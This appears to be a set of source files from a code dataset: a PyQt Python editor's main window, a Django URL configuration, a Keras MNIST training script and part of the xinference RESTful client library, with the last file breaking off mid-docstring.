clicked.\n\n :return:\n \"\"\"\n dialog = ManageInterpretersDialog(self)\n ret = dialog.exec_()\n if ret == QtGui.QDialog.Accepted:\n with open('interpreters.json', 'w') as fp:\n CONSOLE_PYTHON_INTERPRETERS = dialog.temp_interpreters\n json.dump(CONSOLE_PYTHON_INTERPRETERS, fp)\n self.init_interpreters()\n\n def find_in_file(self):\n if self.ui.findPane.isHidden():\n self.ui.findPane.show()\n \n self.ui.find_text_lineEdit.setFocus()\n self.ui.find_text_lineEdit.selectAll()\n\n current_doc = self.documents_tabWidget.currentWidget()\n if self.ui.find_text_lineEdit.text() == '':\n self.ui.find_text_lineEdit.setText(current_doc.editor.selectedText())\n if current_doc is not None:\n 
current_doc.find_text(self.ui.find_text_lineEdit.text(),\n self.ui.find_re_checkBox.isChecked(),\n self.ui.find_case_checkBox.isChecked(),\n self.ui.find_word_checkBox.isChecked(),\n self.ui.find_wrap_checkBox.isChecked(),\n self.ui.find_selection_checkBox.isChecked())\n\n def find_in_file_previous(self):\n current_doc = self.documents_tabWidget.currentWidget()\n if self.ui.find_text_lineEdit.text() == '':\n self.ui.find_text_lineEdit.setText(current_doc.editor.selectedText())\n if current_doc is not None:\n current_doc.find_text(self.ui.find_text_lineEdit.text(),\n self.ui.find_re_checkBox.isChecked(),\n self.ui.find_case_checkBox.isChecked(),\n self.ui.find_word_checkBox.isChecked(),\n self.ui.find_wrap_checkBox.isChecked(),\n self.ui.find_selection_checkBox.isChecked(),\n forward=False)\n\n def replace_in_file(self):\n if self.ui.findPane.isHidden():\n self.ui.findPane.show()\n self.ui.find_text_lineEdit.setFocus()\n\n current_doc = self.documents_tabWidget.currentWidget()\n if self.ui.find_text_lineEdit.text() == '':\n self.ui.find_text_lineEdit.setText(current_doc.editor.selectedText())\n\n if self.ui.replace_text_lineEdit.text() != '':\n if current_doc is not None:\n current_doc.replace_text(self.ui.find_text_lineEdit.text(),\n self.ui.replace_text_lineEdit.text(),\n self.ui.find_re_checkBox.isChecked(),\n self.ui.find_case_checkBox.isChecked(),\n self.ui.find_word_checkBox.isChecked(),\n self.ui.find_wrap_checkBox.isChecked(),\n self.ui.find_selection_checkBox.isChecked())\n\n def replace_all_in_file(self):\n if self.ui.replace_text_lineEdit.text() != '':\n current_doc = self.documents_tabWidget.currentWidget()\n if current_doc is not None:\n i = current_doc.replace_all_text(self.ui.find_text_lineEdit.text(),\n self.ui.replace_text_lineEdit.text(),\n self.ui.find_re_checkBox.isChecked(),\n self.ui.find_case_checkBox.isChecked(),\n self.ui.find_word_checkBox.isChecked(),\n self.ui.find_selection_checkBox.isChecked())\n self.ui.statusbar.showMessage(self.tr('Replaced {0} instances').format(i), 5000)\n\n def update_tab_title(self):\n idx = self.documents_tabWidget.currentIndex()\n tab = self.documents_tabWidget.widget(idx)\n tabname = tab.filename if tab.saved else tab.filename + ' *'\n self.documents_tabWidget.setTabText(idx, tabname)\n\n def update_cursor_position(self, line, idx):\n \"\"\"\n Process cursor position changes from editors for display in statusbar.\n\n :param int line:\n :param int idx:\n :return:\n \"\"\"\n self.lbl_current_position.setText('{0}:{1}'.format(line+1, idx+1)) # zero indexed\n\n def set_current_run_command(self, tab):\n # set the run script command\n if PLATFORM == 'win32':\n command = '{0} \"{1}\" '.format(self.current_interpreter, tab.filepath)\n else:\n command = '{0} {1} '.format(self.current_interpreter, tab.filepath)\n self.ui.runScript_command.setText(command)\n self.ui.runScript_command.setToolTip(command)\n self.runscript_tab = tab\n\n def handle_tab_change(self, idx):\n if idx >= 0:\n tab = self.documents_tabWidget.widget(idx)\n self.lbl_encoding.setText('{0}'.format(tab.encoding.upper()\n if 'utf' or 'ascii' in tab.encoding.lower()\n else tab.encoding))\n\n if self.ui.run_remember_checkBox.checkState():\n # don't update run command if checked\n return\n else:\n self.set_current_run_command(tab)\n else:\n self.ui.runScript_command.setText('')\n self.runscript_tab = None\n\n def handle_run_remember(self, chk_state):\n if not chk_state:\n tab = self.documents_tabWidget.currentWidget()\n if tab:\n # set the run script command\n if PLATFORM == 
'win32':\n command = '{0} \"{1}\" '.format(self.current_interpreter, tab.filepath)\n else:\n command = '{0} {1} '.format(self.current_interpreter, tab.filepath)\n self.ui.runScript_command.setText(command)\n self.ui.runScript_command.setToolTip(command)\n else:\n self.ui.runScript_command.setText('')\n\n def handle_find_wrapped(self):\n self.ui.statusbar.showMessage(self.tr('Find wrapped end of file'), 2000)\n\n def load_anchor(self, url):\n \"\"\"\n Processes URLs for specific actions internal to the application or loads the URLs in the system\n web browser.\n\n :param QtCore.QUrl url:\n The URL to process, it may have schemes beyond http(s)\n :return bool:\n Whether the function handled the signal or not\n\n URLs may have schemes beyond http(s) that the application recognizes and processes for display by the\n built-in browser widget. They follow the standard format {scheme}://{query} where query is a standard URL\n query (?item1=var1&item2=var2)\n Schemes:\n - help: load current interpreter's documentation for a specific Python object, often used to link to error\n documentation in the console tracebacks\n - Query items:\n - object: the Python object to get docstring\n - text: the full text that caused the link to the object (often an error), this is loaded in to the\n help search line widget\n - goto: load a file in to an editor tab and move the cursor to the beginning of a specific line, often used to\n show the user where in a file and error was raised in the console tracebacks\n - Query items:\n - filepath: the full path to the file to load\n - linenum: the line number to move the cursor to\n - http(s): load the full URL in the system browser\n \"\"\"\n scheme = url.scheme()\n ret = False\n if scheme == 'help':\n query = dict(url.queryItems()) # queryItems returns list of tuples\n src = QtCore.QUrl('http://{0}:{1}/'.format(CONSOLE_HOST,\n CONSOLE_HELP_PORT))\n if self.pyconsole_pyversion[0] == 2:\n if query['object'] in py2_exceptions:\n src = QtCore.QUrl('http://{0}:{1}/exceptions.html#{2}'.format(CONSOLE_HOST,\n CONSOLE_HELP_PORT,\n query['object']))\n elif self.pyconsole_pyversion[0] == 3:\n if query['object'] in py3_exceptions:\n src = QtCore.QUrl('http://{0}:{1}/builtins.html#{2}'.format(CONSOLE_HOST,\n CONSOLE_HELP_PORT,\n query['object']))\n try:\n self.ui.helpBrowser.setUrl(src)\n self.ui.helpSearch.setText(urllib.parse.unquote_plus(query['text']))\n self.ui.helpPane.show()\n ret = True\n except UnboundLocalError:\n ret = False\n elif scheme == 'goto':\n query = dict(url.queryItems()) # queryItems returns list of tuples\n filepath = urllib.parse.unquote_plus(query['filepath'])\n linenum = int(query['linenum']) - 1\n found = False\n # Is the file already open?\n for i in range(self.documents_tabWidget.count()):\n tab = self.documents_tabWidget.widget(i)\n # Take care of slash discrepancies, ahem Windows\n if os.path.normcase(tab.filepath) == os.path.normcase(filepath):\n self.documents_tabWidget.setCurrentWidget(tab)\n tab.editor.setCursorPosition(linenum, 0)\n tab.editor.ensureLineVisible(linenum)\n tab.editor.setFocus()\n found = True\n break\n if not found:\n # Load the offending file in another editor\n try:\n tab = self.open_filepath(filepath)\n tab.editor.setCursorPosition(linenum, 0)\n tab.editor.ensureLineVisible(linenum)\n tab.editor.setFocus()\n except AttributeError:\n message_box = QtGui.QMessageBox(self)\n message_box.setWindowTitle(self.tr('File Error'))\n message_box.setText(self.tr('Cannot open file'))\n message_box.setInformativeText(self.tr('The file at {0} 
cannot be opened.').format(filepath))\n ok_btn = message_box.addButton(QtGui.QMessageBox.Ok)\n message_box.setDefaultButton(ok_btn)\n message_box.exec_()\n ret = True\n elif scheme == 'http' or scheme == 'https':\n # Open URL in system browser\n ret = QtGui.QDesktopServices.openUrl(url)\n\n if not ret:\n message_box = QtGui.QMessageBox(self)\n message_box.setWindowTitle(self.tr('Link Error'))\n message_box.setText(self.tr('Cannot open link'))\n message_box.setInformativeText(self.tr('The link at {0} cannot be opened.').format(url.path()))\n ok_btn = message_box.addButton(QtGui.QMessageBox.Ok)\n message_box.setDefaultButton(ok_btn)\n message_box.exec_()\n\n def run_web_search(self):\n \"\"\"\n Combine the search text from the search input with the current web search template and open it with the system\n browser.\n\n :return:\n \"\"\"\n query = self.ui.helpSearch.text()\n url = self.search_url.format(query=urllib.parse.quote_plus(query))\n qurl = QtCore.QUrl(url)\n QtGui.QDesktopServices.openUrl(qurl)\n\n def print_data_to_pyconsole(self, data, fmt, html=False):\n cursor = self.pyconsole_output.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n if html:\n cursor.insertHtml(data)\n else:\n cursor.insertText(data, fmt)\n cursor.movePosition(QtGui.QTextCursor.End)\n self.pyconsole_output.ensureCursorVisible()\n\n def print_data_to_runconsole(self, data, fmt, html=False):\n cursor = self.runscript_console.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n if html:\n cursor.insertHtml(data)\n else:\n cursor.insertText(data, fmt)\n cursor.movePosition(QtGui.QTextCursor.End)\n self.runscript_console.ensureCursorVisible()\n\n def process_stderr_lines(self, lines, cursor):\n \"\"\"\n Process lines from a Python interpreter stderr. For tracebacks additional information is added.\n\n :param list lines:\n :param QtGui.QTextCursor cursor:\n :return:\n\n Lines from stderr often contain traceback data. This function processes those lines and adds additional\n information to help the user troubleshoot. For example links are created to error documentation and to lines\n in source files where errors were raised. 
The output is entered on the text cursor provided by `cursor`.\n \"\"\"\n for line in lines:\n line = line + os.linesep # Line separators were stripped off in the split, add them back\n ll = line.lower()\n ls = line.strip()\n lsl = ls.lower()\n if 'error' in ll and ll[0] != ' ':\n # Information lines start with whitespace so they're not processed here\n m = CONSOLE_RE_ERROR.search(line)\n if m:\n groups = m.groups()\n error = groups[0]\n try:\n desc = line.split(error)\n link = '{2}'.format(error,\n urllib.parse.quote_plus(ls),\n error)\n if len(desc) > 1:\n cursor.insertText(desc[0], self.error_format)\n cursor.insertHtml(link)\n cursor.insertText(''.join(desc[1:]), self.error_format)\n else:\n cursor.insertHtml(link)\n cursor.insertText(''.join(desc), self.error_format)\n cursor.insertText(os.linesep, self.base_format)\n except ValueError:\n cursor.insertText(line, self.error_format)\n else:\n cursor.insertText(line, self.error_format)\n elif 'file' in lsl:\n m = CONSOLE_RE_LINENUM.search(line)\n if m:\n groups = m.groups()\n filepath = groups[1]\n linenum = groups[3]\n url_filepath = urllib.parse.quote_plus(filepath[1:-1]) # Strip leading and trailing quotes\n if 'stdin' in filepath:\n cursor.insertText(line, self.error_format)\n else:\n link = '{2} '.format(url_filepath,\n int(linenum),\n filepath)\n cursor.insertText(groups[0], self.error_format)\n cursor.insertHtml(link)\n cursor.insertText(''.join(groups[2:]), self.error_format)\n else:\n cursor.insertText(line, self.error_format)\n elif CONSOLE_PS1 in line:\n cursor.insertText(ls + ' ', self.base_format)\n elif CONSOLE_PS2 in line:\n cursor.insertText(ls + ' ', self.base_format)\n else:\n cursor.insertText(line, self.error_format)\n\n def process_console_stdout(self):\n self.pyconsole_process.setReadChannel(QtCore.QProcess.StandardOutput)\n data = self.pyconsole_process.readAll()\n lines = data.data().decode().split(os.linesep)\n for line in lines:\n line = line + os.linesep # Line separators were stripped off in the split, add them back\n # Create clickable links\n m = CONSOLE_RE_HTTP.findall(line)\n if m:\n linked = line\n for g in m:\n linked = linked.replace(g, '{0}'.format(g))\n self.print_data_to_pyconsole(linked, self.base_format, html=True)\n self.print_data_to_pyconsole(os.linesep, self.base_format)\n else:\n self.print_data_to_pyconsole(line, self.base_format)\n\n def process_console_stderr(self):\n self.pyconsole_process.setReadChannel(QtCore.QProcess.StandardError)\n data = self.pyconsole_process.readAll()\n lines = data.data().decode().split(os.linesep)\n cursor = self.pyconsole_output.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n self.process_stderr_lines(lines, cursor)\n cursor.movePosition(QtGui.QTextCursor.End)\n self.pyconsole_output.ensureCursorVisible()\n\n # Get the version of Python running on the console\n if self.pyconsole_pyversion is None:\n banner = self.pyconsole_output.toPlainText().split(os.linesep)[0]\n match = CONSOLE_RE_PYVER.search(banner)\n if match:\n self.pyconsole_pyversion = (int(match.group(1)), int(match.group(2)), int(match.group(3)))\n self.lbl_pyversion.setText('Python {0}.{1}.{2}'.format(*self.pyconsole_pyversion))\n\n def process_console_finished(self, code):\n self.pyconsole_output.insertPlainText(os.linesep)\n self.pyconsole_output.insertPlainText(self.tr('Exited with code {0}').format(code))\n self.runscript_console.ensureCursorVisible()\n self.pyconsole_process.close()\n\n def process_runscript_stdout(self):\n 
self.runscript_process.setReadChannel(QtCore.QProcess.StandardOutput)\n data = self.runscript_process.readAll()\n lines = data.data().decode().split(os.linesep)\n for line in lines:\n line = line + os.linesep # Line separators were stripped off in the split, add them back\n m = CONSOLE_RE_HTTP.findall(line)\n if m:\n linked = line\n for g in m:\n linked = linked.replace(g, '{0}'.format(g))\n self.print_data_to_runconsole(linked, self.base_format, html=True)\n self.print_data_to_runconsole(os.linesep, self.base_format)\n else:\n self.print_data_to_runconsole(line, self.base_format)\n\n def process_runscript_stderr(self):\n self.runscript_process.setReadChannel(QtCore.QProcess.StandardError)\n data = self.runscript_process.readAll()\n lines = data.data().decode().split(os.linesep)\n cursor = self.runscript_console.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n self.process_stderr_lines(lines, cursor)\n cursor.movePosition(QtGui.QTextCursor.End)\n self.runscript_console.ensureCursorVisible()\n\n def process_runscript_finished(self, code):\n self.print_data_to_runconsole(os.linesep, self.info_format)\n self.print_data_to_runconsole(self.tr('Exited with code {0}').format(code), self.info_format)\n self.runscript_process.close()\n\n def process_help_stdout(self):\n self.help_process.setReadChannel(QtCore.QProcess.StandardOutput)\n data = self.help_process.readAll()\n cursor = self.runscript_console.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n cursor.insertText(data.data().decode(), self.info_format)\n cursor.movePosition(QtGui.QTextCursor.End)\n self.runscript_console.ensureCursorVisible()\n\n def process_help_stderr(self):\n self.help_process.setReadChannel(QtCore.QProcess.StandardError)\n data = self.help_process.readAll()\n lines = data.data().decode().split(os.linesep)\n cursor = self.runscript_console.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n self.process_stderr_lines(lines, cursor)\n cursor.movePosition(QtGui.QTextCursor.End)\n self.runscript_console.ensureCursorVisible()\n\n def process_help_finished(self, code):\n cursor = self.runscript_console.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n cursor.insertText(os.linesep, self.info_format)\n cursor.insertText(self.tr('HELP: Exited with code {0}').format(code), self.info_format)\n cursor.movePosition(QtGui.QTextCursor.End)\n self.runscript_console.ensureCursorVisible()\n self.help_process.close()\n\n def _save_tab_dialog(self, tab):\n \"\"\"\n Document in tab has not been saved does the user want to save it before deleting\n :param tab:\n :return bool: whether the tab should be deleted\n \"\"\"\n message_box = QtGui.QMessageBox(self)\n message_box.setWindowTitle(tab.filename)\n message_box.setText(self.tr('Do you want to save changes to {0} before closing?'.format(tab.filename)))\n message_box.setInformativeText(tab.filepath)\n save_btn = message_box.addButton(QtGui.QMessageBox.Save)\n message_box.addButton(QtGui.QMessageBox.Discard)\n message_box.addButton(QtGui.QMessageBox.Cancel)\n message_box.setDefaultButton(save_btn)\n res = message_box.exec_()\n if res == QtGui.QMessageBox.Save:\n tab.save()\n return True\n elif res == QtGui.QMessageBox.Discard:\n return True\n else:\n return False\n\n @staticmethod\n def _elide_filepath(path, threshold=20, margin=5):\n \"\"\"\n Shorten a file path string using '...' 
for easier display\n :param str path:\n The file path to shorten\n :param int threshold:\n Paths with lengths less than then will not be shortened\n :param int margin:\n This many characters will be kept before and after the '...'\n :return str:\n \"\"\"\n basepath, filename = os.path.split(path)\n if len(basepath) > threshold:\n return '{0}...{1}{sep}{2}'.format(basepath[:margin], basepath[-margin:], filename, sep=os.sep)\n else:\n return path\n","repo_name":"akehrer/fiddle","sub_path":"fiddle/controllers/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":49262,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"71"} +{"seq_id":"19193582203","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom .views import index, productos, nosotros, contacto, inicio_sesion, carrito, regis_clien_em, regis_clien_per, regis_prod, regis_transp, regis_transp2, perfil_cli_datos, perfil_cli_domici, perfil_cli_pedi, perfil_pro_datos, perfil_pro_domici,perfil_pro_envios,perfil_pro_pedi, perfil_pro_productos, perfil_transp_datos, perfil_transp_domici, perfil_transp_pedi, perfil_transp_transpor, perfil_transp_vehi, subasta, detalle_producto, cerrar_sesion, regiones_por_pais, comunas_por_region, modelo_por_marca\nfrom .views import mercado_pago, success_view\nurlpatterns = [\n path('',index, name='INDEX'),\n path('productos/', productos, name='PRODUCTOS'),\n path('nosotros/', nosotros, name='NOSOTROS'),\n path('contacto/', contacto, name='CONTACTO'),\n path('inicio_sesion/', inicio_sesion, name='INICIO_SESION'),\n path('carrito/', carrito, name='CARRITO'),\n path('regis_clien_em', regis_clien_em, name='REGIS_EMPRESA'),\n path('regis_clien_per', regis_clien_per, name='REGIS_PERSONA'),\n path('regis_prod', regis_prod, name='REGIS_PROD'),\n path('regis_transp', regis_transp, name='REGIS_TRANSP'),\n path('regis_transp2', regis_transp2, name='REGIS_TRANSP2'),\n path('perfil_cli_datos', perfil_cli_datos, name='CLIENTE_DATOS'),\n path('perfil_cli_domici', perfil_cli_domici, name='CLIENTE_DOMICI'),\n path('perfil_cli_pedi', perfil_cli_pedi, name='CLIENTE_PEDI'),\n path('perfil_pro_datos', perfil_pro_datos, name='PROD_DATOS'),\n path('perfil_pro_domici', perfil_pro_domici, name='PROD_DOMICI'),\n path('perfil_pro_envios', perfil_pro_envios, name='PROD_ENVIOS'),\n path('perfil_pro_pedi', perfil_pro_pedi, name='PROD_PEDI'),\n path('perfil_pro_productos', perfil_pro_productos, name='PROD_PRODUC'),\n path('perfil_transp_datos', perfil_transp_datos, name='TRANSP_DATOS'),\n path('perfil_transp_domici', perfil_transp_domici, name='TRANSP_DOMICI'),\n path('perfil_transp_pedi', perfil_transp_pedi, name='TRANSP_PEDI'),\n path('perfil_transp_transpor', perfil_transp_transpor, name='TRANSP_TRANSPOR'),\n path('perfil_transp_vehi', perfil_transp_vehi, name='TRANSP_VEHI'),\n path('subasta', subasta, name='SUBASTAS'),\n path('detalle_producto////', detalle_producto, name='DETALLE_PRODUCTO'),\n path('cerrar_sesion/', cerrar_sesion, name='CERRAR_SESION'),\n path('regiones/', regiones_por_pais, name='REGIONES'),\n path('comunas/', comunas_por_region, name='COMUNAS'),\n path('modelos/', modelo_por_marca, name='MODELOS'),\n path('mercado_pago///', mercado_pago, name='MERCADO_PAGO'),\n path('mercado_pago///success/', success_view, name='success')\n 
\n]\n","repo_name":"Jotap-ux/FERIA-VIRTUAL-DJANGO","sub_path":"FeriaVirtual/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"73296184869","text":"'''Trains a simple convnet on the MNIST dataset.\n\nGets to 99.25% test accuracy after 12 epochs\n(there is still a lot of margin for parameter tuning).\n16 seconds per epoch on a GRID K520 GPU.\n'''\n\nimport numpy as np\nimport pandas as pd\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.optimizers import Adam\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.utils import np_utils\nfrom keras.layers import Conv2D, MaxPooling2D, ZeroPadding2D, GlobalAveragePooling2D\nfrom keras.layers.advanced_activations import LeakyReLU \nfrom keras.preprocessing.image import ImageDataGenerator\n\nbatch_size = 128\nnum_classes = 10\nepochs = 5\n\n# input image dimensions\nimg_rows, img_cols = 28, 28\n\n# the data, split between train and test sets\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\nx_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\nx_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\ninput_shape = (img_rows, img_cols, 1)\n\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nx_train /= 255\nx_test /= 255\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\n# convert class vectors to binary class matrices\ny_train = np_utils.to_categorical(y_train, num_classes)\ny_test = np_utils.to_categorical(y_test, num_classes)\n\n# Three steps to Convolution\n# 1. Convolution\n# 2. Activation\n# 3. Polling\n# Repeat Steps 1,2,3 for adding more hidden layers\n\n# 4. 
After that make a fully connected network\n# This fully connected network gives ability to the CNN\n# to classify the samples\n\nmodel = Sequential()\n\nmodel.add(Conv2D(32, (3, 3), input_shape=(28,28,1)))\nmodel.add(Activation('relu'))\nBatchNormalization(axis=-1)\nmodel.add(Conv2D(32, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n\nBatchNormalization(axis=-1)\nmodel.add(Conv2D(64,(3, 3)))\nmodel.add(Activation('relu'))\nBatchNormalization(axis=-1)\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n\nmodel.add(Flatten())\n# Fully connected layer\n\nBatchNormalization()\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nBatchNormalization()\nmodel.add(Dropout(0.2))\nmodel.add(Dense(10))\n\nmodel.compile(loss='categorical_crossentropy', optimizer=Adam(), metrics=['accuracy'])\n\ngen = ImageDataGenerator(rotation_range=8, width_shift_range=0.08, shear_range=0.3, height_shift_range=0.08, zoom_range=0.08)\n\ntest_gen = ImageDataGenerator()\n\ntrain_generator = gen.flow(x_train, y_train, batch_size=64)\ntest_generator = test_gen.flow(x_test, y_test, batch_size=64)\n\nmodel.fit_generator(train_generator, steps_per_epoch=60000//64, epochs=epochs, validation_data=test_generator, validation_steps=10000//64)\nscore = model.evaluate(x_test, y_test, verbose=0)\nmodel.save('cnn2.h5')\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n","repo_name":"Djdcann/EAIProject","sub_path":"train/mnist2.py","file_name":"mnist2.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27538457347","text":"import uuid\nfrom typing import TYPE_CHECKING, Any, Dict, Iterator, List, Optional, Union\n\nimport requests\n\nfrom ..common import chat_streaming_response_iterator, streaming_response_iterator\n\nif TYPE_CHECKING:\n from ...types import (\n ChatCompletion,\n ChatCompletionChunk,\n ChatCompletionMessage,\n ChatglmCppGenerateConfig,\n Completion,\n CompletionChunk,\n Embedding,\n ImageList,\n LlamaCppGenerateConfig,\n PytorchGenerateConfig,\n )\n\n\nclass RESTfulModelHandle:\n \"\"\"\n A sync model interface (for RESTful client) which provides type hints that makes it much easier to use xinference\n programmatically.\n \"\"\"\n\n def __init__(self, model_uid: str, base_url: str):\n self._model_uid = model_uid\n self._base_url = base_url\n\n\nclass RESTfulEmbeddingModelHandle(RESTfulModelHandle):\n def create_embedding(self, input: Union[str, List[str]]) -> \"Embedding\":\n \"\"\"\n Create an Embedding from user input via RESTful APIs.\n\n Parameters\n ----------\n input: Union[str, List[str]]\n Input text to embed, encoded as a string or array of tokens.\n To embed multiple inputs in a single request, pass an array of strings or array of token arrays.\n\n Returns\n -------\n Embedding\n The resulted Embedding vector that can be easily consumed by machine learning models and algorithms.\n\n Raises\n ------\n RuntimeError\n Report the failure of embeddings and provide the error message.\n\n \"\"\"\n url = f\"{self._base_url}/v1/embeddings\"\n request_body = {\"model\": self._model_uid, \"input\": input}\n response = requests.post(url, json=request_body)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to create the embeddings, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data\n\n\nclass RESTfulImageModelHandle(RESTfulModelHandle):\n def 
text_to_image(\n self,\n prompt: str,\n n: int = 1,\n size: str = \"1024*1024\",\n response_format: str = \"url\",\n ) -> \"ImageList\":\n \"\"\"\n Creates an image by the input text.\n\n Parameters\n ----------\n prompt (`str` or `List[str]`, *optional*):\n The prompt or prompts to guide image generation. If not defined, you need to pass `prompt_embeds`.\n n (`int`, *optional*, defaults to 1):\n The number of images to generate per prompt. Must be between 1 and 10.\n size (`str`, *optional*, defaults to `1024*1024`):\n The width*height in pixels of the generated image. Must be one of 256x256, 512x512, or 1024x1024.\n response_format (`str`, *optional*, defaults to `url`):\n The format in which the generated images are returned. Must be one of url or b64_json.\n Returns\n -------\n ImageList\n A list of image objects.\n \"\"\"\n url = f\"{self._base_url}/v1/images/generations\"\n request_body = {\n \"model\": self._model_uid,\n \"prompt\": prompt,\n \"n\": n,\n \"size\": size,\n \"response_format\": response_format,\n }\n response = requests.post(url, json=request_body)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to create the images, detail: {response.json()['detail']}\"\n )\n\n response_data = response.json()\n return response_data\n\n\nclass RESTfulGenerateModelHandle(RESTfulEmbeddingModelHandle):\n def generate(\n self,\n prompt: str,\n generate_config: Optional[\n Union[\"LlamaCppGenerateConfig\", \"PytorchGenerateConfig\"]\n ] = None,\n ) -> Union[\"Completion\", Iterator[\"CompletionChunk\"]]:\n \"\"\"\n Creates a completion for the provided prompt and parameters via RESTful APIs.\n\n Parameters\n ----------\n prompt: str\n The user's message or user's input.\n generate_config: Optional[Union[\"LlamaCppGenerateConfig\", \"PytorchGenerateConfig\"]]\n Additional configuration for the chat generation.\n \"LlamaCppGenerateConfig\" -> Configuration for ggml model\n \"PytorchGenerateConfig\" -> Configuration for pytorch model\n\n Returns\n -------\n Union[\"Completion\", Iterator[\"CompletionChunk\"]]\n Stream is a parameter in generate_config.\n When stream is set to True, the function will return Iterator[\"CompletionChunk\"].\n When stream is set to False, the function will return \"Completion\".\n\n Raises\n ------\n RuntimeError\n Fail to generate the completion from the server. 
Detailed information provided in error message.\n\n \"\"\"\n\n url = f\"{self._base_url}/v1/completions\"\n\n request_body: Dict[str, Any] = {\"model\": self._model_uid, \"prompt\": prompt}\n if generate_config is not None:\n for key, value in generate_config.items():\n request_body[key] = value\n\n stream = bool(generate_config and generate_config.get(\"stream\"))\n\n response = requests.post(url, json=request_body, stream=stream)\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to generate completion, detail: {response.json()['detail']}\"\n )\n\n if stream:\n return streaming_response_iterator(response.iter_content(chunk_size=None))\n\n response_data = response.json()\n return response_data\n\n\nclass RESTfulChatModelHandle(RESTfulGenerateModelHandle):\n def chat(\n self,\n prompt: str,\n system_prompt: Optional[str] = None,\n chat_history: Optional[List[\"ChatCompletionMessage\"]] = None,\n generate_config: Optional[\n Union[\"LlamaCppGenerateConfig\", \"PytorchGenerateConfig\"]\n ] = None,\n ) -> Union[\"ChatCompletion\", Iterator[\"ChatCompletionChunk\"]]:\n \"\"\"\n Given a list of messages comprising a conversation, the model will return a response via RESTful APIs.\n\n Parameters\n ----------\n prompt: str\n The user's input.\n system_prompt: Optional[str]\n The system context provide to Model prior to any chats.\n chat_history: Optional[List[\"ChatCompletionMessage\"]]\n A list of messages comprising the conversation so far.\n generate_config: Optional[Union[\"LlamaCppGenerateConfig\", \"PytorchGenerateConfig\"]]\n Additional configuration for the chat generation.\n \"LlamaCppGenerateConfig\" -> configuration for ggml model\n \"PytorchGenerateConfig\" -> configuration for pytorch model\n\n Returns\n -------\n Union[\"ChatCompletion\", Iterator[\"ChatCompletionChunk\"]]\n Stream is a parameter in generate_config.\n When stream is set to True, the function will return Iterator[\"ChatCompletionChunk\"].\n When stream is set to False, the function will return \"ChatCompletion\".\n\n Raises\n ------\n RuntimeError\n Report the failure to generate the chat from the server. 
Detailed information provided in error message.\n\n \"\"\"\n\n url = f\"{self._base_url}/v1/chat/completions\"\n\n if chat_history is None:\n chat_history = []\n\n if chat_history and chat_history[0][\"role\"] == \"system\":\n if system_prompt is not None:\n chat_history[0][\"content\"] = system_prompt\n\n else:\n if system_prompt is not None:\n chat_history.insert(0, {\"role\": \"system\", \"content\": system_prompt})\n\n chat_history.append({\"role\": \"user\", \"content\": prompt})\n\n request_body: Dict[str, Any] = {\n \"model\": self._model_uid,\n \"messages\": chat_history,\n }\n if generate_config is not None:\n for key, value in generate_config.items():\n request_body[key] = value\n\n stream = bool(generate_config and generate_config.get(\"stream\"))\n response = requests.post(url, json=request_body, stream=stream)\n\n if response.status_code != 200:\n raise RuntimeError(\n f\"Failed to generate chat completion, detail: {response.json()['detail']}\"\n )\n\n if stream:\n return chat_streaming_response_iterator(\n response.iter_content(chunk_size=None)\n )\n\n response_data = response.json()\n return response_data\n\n\nclass RESTfulChatglmCppChatModelHandle(RESTfulEmbeddingModelHandle):\n def chat(\n self,\n prompt: str,\n chat_history: Optional[List[\"ChatCompletionMessage\"]] = None,\n generate_config: Optional[\"ChatglmCppGenerateConfig\"] = None,\n ) -> Union[\"ChatCompletion\", Iterator[\"ChatCompletionChunk\"]]:\n \"\"\"\n Given a list of messages comprising a conversation, the ChatGLM model will return a response via RESTful APIs.\n\n Parameters\n ----------\n prompt: str\n The user's input.\n chat_history: Optional[List[\"ChatCompletionMessage\"]]\n A list of messages comprising the conversation so far.\n generate_config: Optional[\"ChatglmCppGenerateConfig\"]\n Additional configuration for ChatGLM chat generation.\n\n Returns\n -------\n Union[\"ChatCompletion\", Iterator[\"ChatCompletionChunk\"]]\n Stream is a parameter in generate_config.\n When stream is set to True, the function will return Iterator[\"ChatCompletionChunk\"].\n When stream is set to False, the function will return \"ChatCompletion\".\n\n Raises\n ------\n RuntimeError\n Report the failure to generate the chat from the server. 
